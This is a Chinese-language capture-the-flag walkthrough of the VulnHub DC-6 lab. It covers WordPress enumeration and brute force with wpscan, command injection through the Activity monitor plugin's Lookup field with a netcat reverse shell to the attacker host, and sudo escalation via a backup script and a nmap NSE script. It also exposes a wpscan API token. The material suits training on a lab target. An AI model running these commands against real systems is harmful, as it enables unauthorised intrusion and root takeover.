介绍
系列: DC(此系列共10台)
发布日期:2019 年 4 月 26 日
难度:初级-中级
Flag:获取root权限,并拿到唯一的flag
学习:
● wordpress 安全测试
● 本地代码执行
● nmap 提权
靶机地址:https://www.vulnhub.com/entry/dc-6,315/
提示信息:
- 靶机支持Virtualbox和Vmware
- 需要修改hosts文件,如:192.168.0.142 wordy
- 可以通过如下方式获取密码本,提高测试速度:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
信息收集
主机发现
arp-scan主机发现
arp-scan -I eth0 -l
主机信息探测
信息探测:nmap -A -p- 192.168.40.153,只开放了22和80端口
访问网站
首先修改hosts文件,打开之后看到是个WordPress站点
wpscan测试站点
- wpscan列出站点的用户名、账号。
发现了一些账号:admin、graham、mark、sarah、jens
wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
- wpscan漏扫网站,没有发现有价值信息。
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
- wpscan爆破网站
尝试根据得到的用户名,和靶场提示信息中说到的字典,对网站爆破,得到用户名:mark,密码:helpdesk01
准备密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
准备用户名字典,就是测试出来的那5个用户
开始爆破:
wpscan --url http://wordy -P passwords.txt -U user.txt
登录站点
登录网站之后,经过简单的搜寻,发现了一个主机ping的测试站点。可以试试有没有经典的命令执行漏洞。最不济也能测试一下“Activity monitor”插件有没有漏洞。
输入框下面有两个按钮,经过测试,最后一个“Lookup”按钮可以造成命令执行效果
反弹shell
kali监听:nc -nvlp 9999
反弹命令:127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
获取交互式shell:python3 -c 'import pty; pty.spawn("/bin/bash")'
信息收集
看到靶机上有4个用户,先去他们的家目录看看
发现敏感文件,身份切换到 graham 发现存在sudo提权的可能
提权
身份切换为 jens
思路:发现 graham 可以用 jens 的身份执行
/home/jens/backups.sh,把/bin/bash追加到这个文件,然后用jens 的身份执行这个文件的时候就会打开一个具有 jens 权限的shell。
由/home/jens/backups.sh得知:
- 先进入到对应路径:
cd /home/jens - 把
/bin/bash追加到这个文件:echo '/bin/bash' >> backups.sh - 切换身份:
sudo -u jens ./backups.sh
身份切换之后,发现还可以继续 sudo 提权,提权还真是简单
提权至root
nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令:
echo 'os.execute("/bin/sh")' > rootshell.nse
以root的权限用nmap执行这个脚本:
sudo nmap --script=rootshell.nse
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134244.html
